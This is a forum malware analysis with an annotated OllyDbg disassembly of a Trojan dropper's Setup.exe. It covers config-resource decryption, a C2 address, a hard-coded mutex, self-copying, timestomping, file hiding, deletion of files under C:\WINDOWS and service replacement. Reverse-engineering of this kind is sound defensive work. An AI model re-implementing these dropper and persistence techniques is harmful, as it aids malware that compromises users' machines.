Analysis of a Trojan dropper (某木马分析) by 当红小生 [LSG]
Last edited by 是昔流芳 on 2011-02-11 12:20. What follows is an OllyDbg listing of Setup.exe. The author jumped between call targets with F7, so the address ranges are non-contiguous, and the forum paste stripped the `[...]` from memory operands (e.g. `dword ptr fs:` was most likely `dword ptr fs:[eax]`).
004745BC .E8 E721F9FF call Setup.004067A8 ;anti-debugging checks according to the author - step in with F7 if you want to practise manual tracing
004745C1 .33C0 xor eax,eax ;eax = 0 - most likely the index of the fs:[eax] operands below (the [eax] was lost in the forum paste)
004745C3 .55 push ebp
004745C4 .68 67494700 push Setup.00474967 ;exception-handler address: looks like a Delphi-style SEH (try/finally) frame
004745C9 .64:FF30 push dword ptr fs: ;save the previous fs:[0] record
004745CC .64:8920 mov dword ptr fs:,esp ;install the new frame
004745CF .E8 A4FBFFFF call Setup.00474178 ;main install routine - step in with F7 (its config-reading part is listed at 00463982 below)
00463982 .A1 10304100 mov eax,dword ptr ds: ;class reference at 00410310 (the same class is created again at 004682AA for the .bat builder - presumably a Delphi string-list-like class; operand brackets lost in the paste)
00463987 .E8 84FFF9FF call Setup.00403910 ;constructor-style call (class in eax) - author's note: "gets some strings"
0046398C .8BD8 mov ebx,eax ;ebx = the new object
0046398E .8B15 AC994700 mov edx,dword ptr ds: ;Setup.00479888
00463994 .8B12 mov edx,dword ptr ds: ;edx -> (ASCII "SoftWare\Microsoft\Windows\CurrentVersion\Run" ...) - decrypted config text; the Run-key string is a persistence indicator, although this excerpt never shows the key being written
00463996 .8BC3 mov eax,ebx
00463998 .8B08 mov ecx,dword ptr ds: ;ecx = vtable
0046399A .FF51 2C call dword ptr ds: ;virtual slot +2C with edx = the text - presumably loads/splits the config text into the list (author noted ":\Program Files" here)
0046399D .8D4D F8 lea ecx,dword ptr ss: ;ecx = &local string [ebp-8] (result)
004639A0 .33D2 xor edx,edx ;edx = index 0
004639A2 .8BC3 mov eax,ebx
004639A4 .8B30 mov esi,dword ptr ds:
004639A6 .FF56 0C call dword ptr ds: ;virtual slot +0C (index in edx, result via ecx) - item 0: "SoftWare\Microsoft\Windows\CurrentVersion\Run"
004639A9 .8B55 F8 mov edx,dword ptr ss:
004639AC .B8 7CB44700 mov eax,Setup.0047B47C ;global string at 0047B47C
004639B1 .E8 B20DFAFF call Setup.00404768 ;string assign: [0047B47C] = item 0
004639B6 .8D4D F4 lea ecx,dword ptr ss: ;result -> [ebp-C]
004639B9 .BA 01000000 mov edx,1 ;index 1
004639BE .8BC3 mov eax,ebx
004639C0 .8B30 mov esi,dword ptr ds:
004639C2 .FF56 0C call dword ptr ds: ;item 1: "SOFTWARE\Microsoft\Windows\CurrentVersion\Setup"
004639C5 .8B55 F4 mov edx,dword ptr ss:
004639C8 .B8 78B44700 mov eax,Setup.0047B478
004639CD .E8 960DFAFF call Setup.00404768 ;[0047B478] = item 1
004639D2 .8D4D F0 lea ecx,dword ptr ss: ;result -> [ebp-10]
004639D5 .BA 02000000 mov edx,2 ;index 2
004639DA .8BC3 mov eax,ebx
004639DC .8B30 mov esi,dword ptr ds:
004639DE .FF56 0C call dword ptr ds: ;item 2: "config" (becomes the eax argument of the resource reader below)
004639E1 .8B55 F0 mov edx,dword ptr ss:
004639E4 .B8 74B44700 mov eax,Setup.0047B474
004639E9 .E8 7A0DFAFF call Setup.00404768 ;[0047B474] = item 2 ("config")
004639EE .8D4D EC lea ecx,dword ptr ss: ;result -> [ebp-14]
004639F1 .BA 03000000 mov edx,3 ;index 3
004639F6 .8BC3 mov eax,ebx
004639F8 .8B30 mov esi,dword ptr ds:
004639FA .FF56 0C call dword ptr ds: ;item 3 (value not recorded by the author; becomes the edx argument of the resource reader below)
004639FD .8B55 EC mov edx,dword ptr ss:
00463A00 .B8 70B44700 mov eax,Setup.0047B470
00463A05 .E8 5E0DFAFF call Setup.00404768 ;[0047B470] = item 3
00463A0A .8D4D E8 lea ecx,dword ptr ss: ;result -> [ebp-18]
00463A0D .BA 04000000 mov edx,4 ;index 4
00463A12 .8BC3 mov eax,ebx
00463A14 .8B30 mov esi,dword ptr ds:
00463A16 .FF56 0C call dword ptr ds: ;item 4: (ASCII ":\Program Files") - install-directory suffix
00463A19 .8B55 E8 mov edx,dword ptr ss:
00463A1C .B8 6CB44700 mov eax,Setup.0047B46C
00463A21 .E8 420DFAFF call Setup.00404768 ;[0047B46C] = item 4
00463A26 .8BC3 mov eax,ebx
00463A28 .E8 13FFF9FF call Setup.00403940 ;presumably frees the list object (eax = object) - confirm
00463A2D .A1 70B44700 mov eax,dword ptr ds: ;[0047B470] (item 3)
00463A32 .E8 9D11FAFF call Setup.00404BD4 ;string -> PChar (the same helper precedes every LPCSTR API call in this listing)
00463A37 .50 push eax ;saved, popped into edx below
00463A38 .A1 74B44700 mov eax,dword ptr ds: ;[0047B474] ("config")
00463A3D .E8 9211FAFF call Setup.00404BD4 ;-> PChar
00463A42 .B9 00B54700 mov ecx,Setup.0047B500 ;ecx = output string at 0047B500
00463A47 .5A pop edx ;edx = PChar(item 3); author: the resource is named "TFrom2" - visible in a resource editor
00463A48 .E8 FBF9FFFF call Setup.00463448 ;reads the encrypted config blob (including the encrypted check-in/C2 address) from the resource - F7; FindResourceA/LoadResource/LockResource are at 0046346F below
00463A4D .84C0 test al,al ;al = success flag
00463A4F .0F84 DF010000 je Setup.00463C34 ;read failed -> abort (no config, nothing to install)
00463A55 .E8 5631FAFF call <jmp.&kernel32.GetVersion>;GetVersion
00463A5A .A9 00000080 test eax,80000000 ;high bit set = Windows 9x/ME platform (GetVersion's documented encoding)
00463A5F .75 0A jnz short Setup.00463A6B
00463A61 .C705 DC984700>mov dword ptr ds:,-1 ;NT family: [004798DC] = -1 (platform flag; how it is consumed is not in this excerpt)
00463A6B >8D45 FC lea eax,dword ptr ss: ;eax = &local [ebp-4]
00463A6E .E8 BDFDFFFF call Setup.00463830 ;decrypts the check-in (C2) address - F7; body listed at 00463864 below
0046346F .FF15 AC984700 call dword ptr ds: ;kernel32.FindResourceA (args pushed before this excerpt; resource name "TFrom2" per the author)
00463475 .8BD8 mov ebx,eax ;ebx = HRSRC
00463477 .85DB test ebx,ebx
00463479 .74 4A je short Setup.004634C5 ;resource missing -> failure path
0046347B .90 nop
0046347C .53 push ebx ;hResInfo
0046347D .A1 64A64700 mov eax,dword ptr ds: ;[0047A664] - module handle used for all three resource calls (presumably the EXE's own HInstance)
00463482 .50 push eax ;hModule
00463483 .FF15 B0984700 call dword ptr ds: ;kernel32.LoadResource
00463489 .8BF0 mov esi,eax ;esi = HGLOBAL
0046348B .85F6 test esi,esi
0046348D .74 36 je short Setup.004634C5 ;load failed -> failure path
0046348F .90 nop
00463490 .53 push ebx ;hResInfo
00463491 .A1 64A64700 mov eax,dword ptr ds:
00463496 .50 push eax ;hModule
00463497 .FF15 B4984700 call dword ptr ds: ;kernel32.SizeofResource
0046349D .8BD8 mov ebx,eax ;ebx = resource size in bytes (not validated here)
0046349F .90 nop
004634A0 .8B45 FC mov eax,dword ptr ss: ;eax = output string var ([ebp-4])
004634A3 .8BD3 mov edx,ebx ;edx = size
004634A5 .E8 B618FAFF call Setup.00404D60 ;grow the string to `size` bytes (the same helper takes a size in edx at 004638C3)
004634AA .8B45 FC mov eax,dword ptr ss:
004634AD .E8 7A17FAFF call Setup.00404C2C ;string -> writable buffer pointer
004634B2 .50 push eax ;destination pointer, left on the stack for the copy that follows LockResource (outside this excerpt)
004634B3 .56 push esi ; /hResource
004634B4 .E8 8F37FAFF call <jmp.&kernel32.LockResource>; \LockResource - returns the raw (still encrypted) blob pointer
00463864 .E8 430FFAFF call Setup.004047AC ;string assign (author: yields ":\Program Files" on this path)
00463869 .EB 76 jmp short Setup.004638E1 ;skip the stream transform below and go straight to the decrypt call
0046386B .A1 00334100 mov eax,dword ptr ds: ;class reference at 00413300
00463870 .E8 9B00FAFF call Setup.00403910 ;construct it
00463875 .8BF0 mov esi,eax ;esi = object A
00463877 .8B45 F8 mov eax,dword ptr ss: ;[ebp-8] = input string (encrypted blob)
0046387A .E8 5511FAFF call Setup.004049D4 ;presumably string length - confirm
0046387F .50 push eax ;length, popped into ecx below
00463880 .8D45 F8 lea eax,dword ptr ss:
00463883 .E8 A413FAFF call Setup.00404C2C ;buffer pointer of [ebp-8]
00463888 .8BD0 mov edx,eax ;edx = buffer
0046388A .8BC6 mov eax,esi
0046388C .59 pop ecx ;ecx = length
0046388D .E8 F636FBFF call Setup.00416F88 ;A.method(buffer, length) - looks like a stream Write; confirm
00463892 .6A 00 push 0
00463894 .6A 00 push 0
00463896 .8BC6 mov eax,esi
00463898 .E8 A734FBFF call Setup.00416D44 ;A.method(0, 0) - looks like a Seek to offset 0; confirm
0046389D .8BCE mov ecx,esi ;ecx = A (passed to the next constructor)
0046389F .B2 01 mov dl,1 ;dl = 1 (same constructor convention as at 004682A8)
004638A1 .A1 CC424500 mov eax,dword ptr ds: ;class reference at 004542CC
004638A6 .E8 7910FFFF call Setup.00454924 ;construct object B wrapping A (a decoding/filter stream is the natural reading - not verified here)
004638AB .8BD8 mov ebx,eax ;ebx = B
004638AD .6A 00 push 0
004638AF .6A 00 push 0
004638B1 .8BC3 mov eax,ebx
004638B3 .E8 8C34FBFF call Setup.00416D44 ;B.Seek(0, 0)-style call
004638B8 .8BC3 mov eax,ebx
004638BA .8B10 mov edx,dword ptr ds: ;edx = B's vtable
004638BC .FF12 call dword ptr ds: ;B virtual slot 0 -> eax (used as a size below)
004638BE .8BD0 mov edx,eax
004638C0 .8D45 F8 lea eax,dword ptr ss:
004638C3 .E8 9814FAFF call Setup.00404D60 ;SetLength([ebp-8], size)
004638C8 .8BC3 mov eax,ebx
004638CA .8B10 mov edx,dword ptr ds:
004638CC .FF12 call dword ptr ds: ;B virtual slot 0 again -> size
004638CE .50 push eax ;count
004638CF .8D45 F8 lea eax,dword ptr ss:
004638D2 .E8 5513FAFF call Setup.00404C2C ;buffer pointer of [ebp-8]
004638D7 .8BD0 mov edx,eax
004638D9 .8BC3 mov eax,ebx
004638DB .59 pop ecx ;ecx = count
004638DC .8B38 mov edi,dword ptr ds:
004638DE .FF57 0C call dword ptr ds: ;B virtual slot +0C (buffer, count) - reads the transformed bytes back into [ebp-8]
004638E1 >8D55 F4 lea edx,dword ptr ss: ;edx = &output [ebp-C]
004638E4 .8B45 F8 mov eax,dword ptr ss: ;eax = [ebp-8] - per the author this is the key
004638E7 .E8 1CA6FBFF call Setup.0041DF08 ;the decryption routine (algorithm not traced by the author) - produces the check-in/C2 address
004638EC .8B55 F4 mov edx,dword ptr ss:
004638EF .8D45 F8 lea eax,dword ptr ss:
004638F2 .E8 B50EFAFF call Setup.004047AC ;[ebp-8] = decrypted result
004638F7 .8BC6 mov eax,esi ;eax = A (cleanup follows outside this excerpt)
00463AF2 .E8 8D0EFAFF call Setup.00404984 ;copy a fixed-length field into a string (author recorded "%ProgramFiles%\Internet Explorer\IEXPLORE.EXE")
00463AF7 .8B45 DC mov eax,dword ptr ss: ;[ebp-24] = that template path
00463AFA .8D55 E0 lea edx,dword ptr ss: ;edx = &[ebp-20] result
00463AFD .E8 420C0000 call Setup.00464744 ;expands %ProgramFiles% -> "C:\Program Files\Internet Explorer\IEXPLORE.EXE" (helper not shown; what the IE path is later used for is not in this excerpt)
00463B02 .8B55 E0 mov edx,dword ptr ss:
00463B05 .B8 C8B44700 mov eax,Setup.0047B4C8
00463B0A .E8 590CFAFF call Setup.00404768 ;[0047B4C8] = expanded IEXPLORE.EXE path
00463B0F .8B83 B8010000 mov eax,dword ptr ds: ;ebx = decrypted config struct; dword at +1B8
00463B15 .A3 E8984700 mov dword ptr ds:,eax ;[004798E8] = config+1B8
00463B1A .0FB743 74 movzx eax,word ptr ds: ;16-bit field at config+74
00463B1E .A3 88B44700 mov dword ptr ds:,eax ;[0047B488] = config+74 (a port is a plausible but unverified reading)
00463B23 .8D55 D8 lea edx,dword ptr ss: ;edx = &[ebp-28]
00463B26 .A1 A8B44700 mov eax,dword ptr ds: ;[0047B4A8] (the copied-file path global, see 0047480F)
00463B2B .E8 2859FAFF call Setup.00409458 ;author: "get name" - derives a name from that path (probably the file-name part; confirm)
00463B30 .8B55 D8 mov edx,dword ptr ss:
00463B33 .B8 ACB44700 mov eax,Setup.0047B4AC
00463B38 .E8 2B0CFAFF call Setup.00404768 ;[0047B4AC] = that name
00463B3D .0FB743 76 movzx eax,word ptr ds: ;16-bit field at config+76
00463B41 .A3 B4B44700 mov dword ptr ds:,eax ;[0047B4B4] = config+76
00463B46 .B8 B8B44700 mov eax,Setup.0047B4B8 ;destination global
00463B4B .8D53 78 lea edx,dword ptr ds: ;edx = config+78: group name (author's label; the copy call follows outside the excerpt)
00463BDC .B8 FCB44700 mov eax,Setup.0047B4FC ;destination global
00463BE1 .8D93 DF010000 lea edx,dword ptr ds: ;edx = config+1DF: description (author's label)
00463BE7 .B9 64000000 mov ecx,64 ;field length 0x64 = 100 bytes
00463BEC .E8 930DFAFF call Setup.00404984 ;[0047B4FC] = description (100-byte field)
00463BF1 .B8 F8B44700 mov eax,Setup.0047B4F8 ;destination global
00463BF6 .8D93 43020000 lea edx,dword ptr ds: ;edx = config+243: display name (author's label; length and copy follow outside the excerpt)
004745F5 .E8 DA05F9FF call Setup.00404BD4 ;string -> PChar (author: "copy path", i.e. the intended install path)
004745FA .50 push eax ;second lstrcmpiA argument
004745FB .8D55 EC lea edx,dword ptr ss: ;edx = &[ebp-14]
004745FE .33C0 xor eax,eax ;index 0
00474600 .E8 5FE5F8FF call Setup.00402B64 ;own module path (GetModuleFileNameA, see 00402B7C below)
00474605 .8B45 EC mov eax,dword ptr ss:
00474608 .E8 C705F9FF call Setup.00404BD4 ;-> PChar
0047460D .50 push eax ;first lstrcmpiA argument
0047460E .A1 4C9C4700 mov eax,dword ptr ds: ;[00479C4C] -> resolved import pointer
00474613 .8B00 mov eax,dword ptr ds:
00474615 .FFD0 call eax ;kernel32.lstrcmpiA(own path, install path) - case-insensitive compare
00474617 .85C0 test eax,eax
00474619 .0F84 CF020000 je Setup.004748EE ;paths equal -> already running from the install location: jump to the exit path
0047461F .E8 00FCFFFF call Setup.00474224 ;single-instance mutex check - F7 (body at 00474224 below)
00474224/[ DISCUZ_CODE_1 ]nbsp; B9 68424700 mov ecx,Setup.00474268 ;ASCII "SJhensoie23sdsf" - hard-coded mutex name, usable as a host indicator (the forum mangled OllyDbg's function-entry marker on this line)
00474229|.83CA FF or edx,FFFFFFFF ;edx = -1 -> bInitialOwner = TRUE after the normalisation in 00468460
0047422C|.33C0 xor eax,eax ;lpMutexAttributes = NULL
0047422E|.E8 2D42FFFF call Setup.00468460 ;CreateMutexA wrapper (below)
00468460/[ DISCUZ_CODE_1 ]nbsp; 51 push ecx ; /MutexName - wrapper: CreateMutexA(eax, edx != 0, ecx); returns the handle in eax
00468461|.83FA 01 cmp edx,1 ; |normalise edx to a BOOL: (edx != 0) ? 1 : 0
00468464|.1BD2 sbb edx,edx ; |edx = (edx < 1 unsigned) ? -1 : 0
00468466|.42 inc edx ; |-> 0 or 1
00468467|.83E2 7F and edx,7F ; |(redundant after the inc; harmless)
0046846A|.52 push edx ; |InitialOwner
0046846B|.50 push eax ; |pSecurity
0046846C|.FF15 B8984700 call dword ptr ds: ; \CreateMutexA - GetLastError()==ERROR_ALREADY_EXISTS (0xB7) is checked by the caller
00468472\.C3 retn
00474233|.A3 70C64700 mov dword ptr ds:,eax ;[0047C670] = mutex handle
00474238|.833D 70C64700>cmp dword ptr ds:,0
0047423F|.74 24 je short Setup.00474265 ;CreateMutexA failed -> just return (the install still proceeds)
00474241|.90 nop
00474242|.E8 F128F9FF call <jmp.&kernel32.GetLastError> ; [GetLastError
00474247|.3D B7000000 cmp eax,0B7 ;0xB7 = ERROR_ALREADY_EXISTS: another instance already owns the mutex
0047424C|.75 17 jnz short Setup.00474265 ;first instance -> return
0047424E|.A1 70C64700 mov eax,dword ptr ds: ;duplicate instance: close our handle ...
00474253|.50 push eax ; /hObject = the handle from [0047C670] (OllyDbg's "=> NULL" annotation was a stale register value)
00474254|.E8 9727F9FF call <jmp.&kernel32.CloseHandle>; \CloseHandle
00474259|.6A 00 push 0 ;uExitCode = 0
0047425B|.A1 C49C4700 mov eax,dword ptr ds: ;[00479CC4] -> kernel32.ExitProcess (the same pointer is labelled ExitProcess at 00474709 and 004748EA)
00474260|.8B00 mov eax,dword ptr ds:
00474262|.FFD0 call eax ;... and exit
00474264|.90 nop
00474265\>C3 retn
004090DC/[ DISCUZ_CODE_1 ]nbsp; 55 push ebp ;eax = file name string -> returns the packed DOS date/time of the file's last write in eax, or -1 (this matches Delphi's FileAge; the forum mangled the entry marker)
004090DD|.8BEC mov ebp,esp
004090DF|.81C4 B4FEFFFF add esp,-14C ;0x14C = sizeof(WIN32_FIND_DATAA) (0x140) + 0xC of locals
004090E5|.53 push ebx
004090E6|.8BD8 mov ebx,eax ;ebx = file name
004090E8|.8D85 B4FEFFFF lea eax, ;eax = &find data at [ebp-14C]
004090EE|.50 push eax ;lpFindFileData
004090EF|.8BC3 mov eax,ebx
004090F1|.E8 DEBAFFFF call Setup.00404BD4 ;-> PChar
004090F6|.50 push eax ; |FileName
004090F7|.E8 84D9FFFF call <jmp.&kernel32.FindFirstFile>; \FindFirstFileA
004090FC|.83F8 FF cmp eax,-1 ;INVALID_HANDLE_VALUE
004090FF|.74 34 je short Setup.00409135 ;not found -> -1
00409101|.50 push eax ; /hSearch
00409102|.E8 71D9FFFF call <jmp.&kernel32.FindClose> ; \FindClose (closed before the data is used - no handle leak)
00409107|.F685 B4FEFFFF>test byte ptr ss:,10 ;dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY (0x10)
0040910E|.75 25 jnz short Setup.00409135 ;directories -> -1
00409110|.8D45 F4 lea eax, ;eax = &local FILETIME [ebp-C]
00409113|.50 push eax ; /pLocalFileTime
00409114|.8D85 C8FEFFFF lea eax, ; |[ebp-138] = find data + 0x14 = ftLastWriteTime
0040911A|.50 push eax ; |pFileTime
0040911B|.E8 48D9FFFF call <jmp.&kernel32.FileTimeToLoc>; \FileTimeToLocalFileTime
00409120|.8D45 FC lea eax, ;[ebp-4] low word receives the DOS time
00409123|.50 push eax ; /pDOSTime
00409124|.8D45 FE lea eax,dword ptr ss: ; |[ebp-2] high word receives the DOS date
00409127|.50 push eax ; |pDOSDate
00409128|.8D45 F4 lea eax, ; |local FILETIME
0040912B|.50 push eax ; |pFileTime
0040912C|.E8 2FD9FFFF call <jmp.&kernel32.FileTimeToDos>; \FileTimeToDosDateTime
00409131|.85C0 test eax,eax
00409133|.75 07 jnz short Setup.0040913C ;converted -> return the packed value
00409135|>C745 FC FFFFF>mov ,-1 ;[ebp-4] = -1 on any failure
0040913C|>8B45 FC mov eax, ;eax = packed date:time (or -1)
0040913F|.5B pop ebx
00409140|.8BE5 mov esp,ebp
00409142|.5D pop ebp
00409143\.C3 retn
004746A8 . /74 6E je short Setup.00474718 ;no copy at the install path yet -> go straight to copying (author: "has it already copied itself?")
004746AA . |B8 B80B0000 mov eax,0BB8 ;0xBB8 = 3000 - argument to the next call (author: "get boot time"; a millisecond wait/retry budget would fit the value better - not verified)
004746AF . |E8 F8EFFEFF call Setup.004636AC
004746B4 . |6A 00 push 0 ;dwFileAttributes = 0 - clear READONLY/HIDDEN/SYSTEM so the old copy can be deleted
004746B6 . |A1 E89B4700 mov eax,dword ptr ds: ;[00479BE8] -> install path string
004746BB . |8B00 mov eax,dword ptr ds:
004746BD . |E8 1205F9FF call Setup.00404BD4 ;-> PChar
004746C2 . |50 push eax ;lpFileName
004746C3 . |A1 449D4700 mov eax,dword ptr ds: ;[00479D44] -> kernel32.SetFileAttributesA (resolved at run time)
004746C8 . |8B00 mov eax,dword ptr ds:
004746CA . |FFD0 call eax ;SetFileAttributesA(old copy, 0)
004746CC . |A1 E89B4700 mov eax,dword ptr ds:
004746D1 . |8B00 mov eax,dword ptr ds:
004746D3 . |E8 904CF9FF call Setup.00409368 ;delete the old copy (the same helper is labelled deletefile at 00462D70)
004746D8 . |A1 E89B4700 mov eax,dword ptr ds:
004746DD . |8B00 mov eax,dword ptr ds:
004746DF . |E8 604AF9FF call Setup.00409144 ;file-exists check on the same path
004746E4 . |84C0 test al,al
004746E6 . |74 30 je short Setup.00474718 ;gone -> proceed to re-copy
004746E8 . |6A 07 push 7 ;delete failed (the copy is probably still in use): 0x7 = READONLY|HIDDEN|SYSTEM
004746EA . |A1 E89B4700 mov eax,dword ptr ds:
004746EF . |8B00 mov eax,dword ptr ds:
004746F1 . |E8 DE04F9FF call Setup.00404BD4 ;-> PChar
004746F6 . |50 push eax
004746F7 . |A1 449D4700 mov eax,dword ptr ds:
004746FC . |8B00 mov eax,dword ptr ds:
004746FE . |FFD0 call eax ;SetFileAttributesA(old copy, 7) - re-hide it
00474700 . |6A 00 push 0
00474702 . |A1 C49C4700 mov eax,dword ptr ds:
00474707 . |8B00 mov eax,dword ptr ds:
00474709 . |FFD0 call eax ;kernel32.ExitProcess(0) - give up and leave the existing install in place
00474726 .50 push eax ;lpNewFileName (PChar of the install path, computed just before this excerpt)
00474727 .8D55 E4 lea edx,dword ptr ss: ;edx = &[ebp-1C]
0047472A .33C0 xor eax,eax ;index 0
0047472C .E8 33E4F8FF call Setup.00402B64 ;own module path (GetModuleFileNameA, see 00402B7C)
00474731 .8B45 E4 mov eax,dword ptr ss:
00474734 .E8 9B04F9FF call Setup.00404BD4 ;-> PChar
00474739 .50 push eax ;lpExistingFileName = self
0047473A .A1 709D4700 mov eax,dword ptr ds: ;[00479D70] -> resolved import pointer
0047473F .8B00 mov eax,dword ptr ds: ; (kernel32.CopyFileA)
00474741 .FFD0 call eax ;CopyFileA(self, install path, bFailIfExists) - called through a pointer rather than the import table; bFailIfExists was pushed before this excerpt
00474743 .E8 8863F9FF call Setup.0040AAD0 ;current local time (GetLocalTime below) - presumably feeds the timestamp rewrite at 0047477B
0040AAD0/[ DISCUZ_CODE_1 ]nbsp; 83C4 E0 add esp,-20 ;0x20 bytes of locals: a SYSTEMTIME (16 bytes) plus scratch (the forum mangled the entry marker)
0040AAD3|.8D4424 08 lea eax,dword ptr ss: ;eax = &[esp+8] SYSTEMTIME
0040AAD7|.50 push eax ; /pLocaltime
0040AAD8|.E8 63C0FFFF call <jmp.&kernel32.GetLocalTime> ; \GetLocalTime (conversion to the return value follows outside the excerpt)
0047477B .E8 A4E1FEFF call Setup.00462924 ;rewrites the copied file's timestamp (author's label) - timestomping: do not trust the dropped binary's mtime when building a timeline
00474780 .A1 D89B4700 mov eax,dword ptr ds: ;[00479BD8] -> attribute value to apply
00474785 .8B00 mov eax,dword ptr ds:
00474787 .50 push eax ;dwFileAttributes (from a global; the value is not visible here)
00474788 .A1 E89B4700 mov eax,dword ptr ds: ;[00479BE8] -> install path string
0047478D .8B00 mov eax,dword ptr ds:
0047478F .E8 4004F9FF call Setup.00404BD4 ;-> PChar of the copied file's path
00474794 .50 push eax ;lpFileName
00474795 .A1 449D4700 mov eax,dword ptr ds: ;[00479D44] -> kernel32.SetFileAttributesA
0047479A .8B00 mov eax,dword ptr ds: ;the call itself is just past this excerpt
00462CCC .BA 3F000000 mov edx,3F ;attribute mask 0x3F = every file attribute (Delphi's faAnyFile)
00462CD1 .8B45 F4 mov eax,dword ptr ss: ;search pattern "C:\WINDOWS\*.dat" (author's annotation; built before this excerpt)
00462CD4 .E8 FF65FAFF call Setup.004092D8 ;FindFirst(pattern, mask, &rec) -> 0 on success
00462CD9 .85C0 test eax,eax
00462CDB .0F85 BB000000 jnz Setup.00462D9C ;nothing matched -> close and leave
00462CE1 >8D85 98FEFFFF lea eax,dword ptr ss: ;loop head: eax = &[ebp-168] (full path string)
00462CE7 .8B8D A8FEFFFF mov ecx,dword ptr ss: ;ecx = found file name (the author saw "bootstat.dat" here)
00462CED .8B55 FC mov edx,dword ptr ss: ;edx = "C:\WINDOWS\"
00462CF0 .E8 2B1DFAFF call Setup.00404A20 ;concat -> "C:\WINDOWS\bootstat.dat"
00462CF5 .8B85 98FEFFFF mov eax,dword ptr ss:
00462CFB .E8 44FEFFFF call Setup.00462B44 ;per-file predicate on the full path (its criterion is not in this excerpt)
00462D00 .84C0 test al,al
00462D02 .0F84 81000000 je Setup.00462D89 ;predicate false -> next file
00462D08 .33C0 xor eax,eax ;SEH (try/finally-style) frame around the delete
00462D0A .55 push ebp
00462D0B .68 7F2D4600 push Setup.00462D7F
00462D10 .64:FF30 push dword ptr fs:
00462D13 .64:8920 mov dword ptr fs:,esp
00462D16 .6A 00 push 0 ;dwFileAttributes = 0 - strip READONLY/HIDDEN/SYSTEM first
00462D18 .8D85 94FEFFFF lea eax,dword ptr ss:
00462D1E .8B8D A8FEFFFF mov ecx,dword ptr ss:
00462D24 .8B55 FC mov edx,dword ptr ss:
00462D27 .E8 F41CFAFF call Setup.00404A20 ;rebuild the full path into [ebp-16C]
00462D2C .8B85 94FEFFFF mov eax,dword ptr ss: ;"C:\WINDOWS\bootstat.dat"
00462D32 .E8 9D1EFAFF call Setup.00404BD4 ;-> PChar
00462D37 .50 push eax ; |FileName
00462D38 .FF15 C0984700 call dword ptr ds: ; \SetFileAttributesA(path, 0)
00462D3E .8D85 8CFEFFFF lea eax,dword ptr ss:
00462D44 .8B8D A8FEFFFF mov ecx,dword ptr ss:
00462D4A .8B55 FC mov edx,dword ptr ss:
00462D4D .E8 CE1CFAFF call Setup.00404A20 ;rebuild the full path again into [ebp-174]
00462D52 .8B85 8CFEFFFF mov eax,dword ptr ss:
00462D58 .E8 771EFAFF call Setup.00404BD4 ;-> PChar
00462D5D .8BD0 mov edx,eax
00462D5F .8D85 90FEFFFF lea eax,dword ptr ss:
00462D65 .E8 A21BFAFF call Setup.0040490C ;presumably string from PChar into [ebp-170]
00462D6A .8B85 90FEFFFF mov eax,dword ptr ss:
00462D70 .E8 F365FAFF call Setup.00409368 ;deletefile - the author's loop note says "creates some .dat files", but the visible calls only clear attributes and delete; deleting under C:\WINDOWS implies the dropper expects admin rights
00462D75 .33C0 xor eax,eax ;finally: unwind the SEH frame
00462D77 .5A pop edx
00462D78 .59 pop ecx
00462D79 .59 pop ecx
00462D7A .64:8910 mov dword ptr fs:,edx
00462D7D .EB 0A jmp short Setup.00462D89
00462D7F .^ E9 5C10FAFF jmp Setup.00403DE0 ;exception-handler target
00462D84 .E8 BF13FAFF call Setup.00404148 ;finally-block epilogue (presumably temporary-string cleanup)
00462D89 >8D85 9CFEFFFF lea eax,dword ptr ss: ;eax = &search record
00462D8F .E8 9465FAFF call Setup.00409328 ;FindNext
00462D94 .85C0 test eax,eax
00462D96 .^ 0F84 45FFFFFF je Setup.00462CE1 ;0 = another match -> loop over every *.dat in C:\WINDOWS
00462D9C >8D85 9CFEFFFF lea eax,dword ptr ss:
00462DA2 .E8 A565FAFF call Setup.0040934C ;FindClose
004747DB .E8 2491FAFF call Setup.0041D904 ;F7: opens the SCM and deletes any existing service with the configured name (body at 0041D948 below); author: "get service name"
0041D948 .E8 6F9EFEFF call <jmp.&advapi32.OpenSCManagerA> ;args pushed before this excerpt (the function starts at 0041D904)
0041D94D .8BD8 mov ebx,eax ;ebx = SC_HANDLE
0041D94F .85DB test ebx,ebx
0041D951 .74 31 je short Setup.0041D984 ;SCM not opened (e.g. no admin rights) -> result false; author: "check whether the service exists"
0041D953 .68 FF010F00 push 0F01FF ;dwDesiredAccess = SERVICE_ALL_ACCESS
0041D958 .8B45 FC mov eax,dword ptr ss: ;[ebp-4] = service name
0041D95B .E8 7472FEFF call Setup.00404BD4 ;-> PChar
0041D960 .50 push eax ;lpServiceName
0041D961 .53 push ebx ;hSCManager
0041D962 .E8 5D9EFEFF call <jmp.&advapi32.OpenServiceA> ;does a service with that name already exist?
0041D967 .8BF8 mov edi,eax
0041D969 .85FF test edi,edi
0041D96B .74 11 je short Setup.0041D97E ;no such service -> just close the SCM
0041D96D .57 push edi
0041D96E .E8 319EFEFF call <jmp.&advapi32.DeleteService> ;remove the stale service so it can be re-created; no ControlService(STOP) is visible, so a running old instance is only marked for deletion
0041D973 .BE 01000000 mov esi,1 ;esi = 1 -> result true
0041D978 .57 push edi
0041D979 .E8 0E9EFEFF call <jmp.&advapi32.CloseServiceHandle>
0041D97E >53 push ebx
0041D97F .E8 089EFEFF call <jmp.&advapi32.CloseServiceHandle>
0041D984 >85F6 test esi,esi
0041D986 .7E 06 jle short Setup.0041D98E
0041D988 .C645 FB 01 mov byte ptr ss:,1 ;[ebp-5] = true (an existing service was deleted)
0041D98C .EB 04 jmp short Setup.0041D992
0041D98E >C645 FB 00 mov byte ptr ss:,0 ;[ebp-5] = false
0041D992 >33C0 xor eax,eax ;SEH frame teardown (the frame was set up before this excerpt)
0041D994 .5A pop edx
0041D995 .59 pop ecx
0041D996 .59 pop ecx
0041D997 .64:8910 mov dword ptr fs:,edx ;the function continues past this excerpt
004747E0 .68 E8030000 push 3E8 ;dwMilliseconds = 1000 (1 s) - presumably lets the DeleteService above settle
004747E5 .A1 C89B4700 mov eax,dword ptr ds: ;[00479BC8] -> kernel32.Sleep (resolved at run time)
004747EA .8B00 mov eax,dword ptr ds:
004747EC .FFD0 call eax ; (kernel32.Sleep)
004747EE .A1 FC994700 mov eax,dword ptr ds: ;[004799FC] -> service description string
004747F3 .8B00 mov eax,dword ptr ds:
004747F5 .50 push eax ;4th argument (on the stack): description
004747F6 .A1 F09C4700 mov eax,dword ptr ds: ;[00479CF0] -> display name string
004747FB .8B00 mov eax,dword ptr ds:
004747FD .E8 D203F9FF call Setup.00404BD4 ;-> PChar
00474802 .50 push eax ;saved, popped into edx below
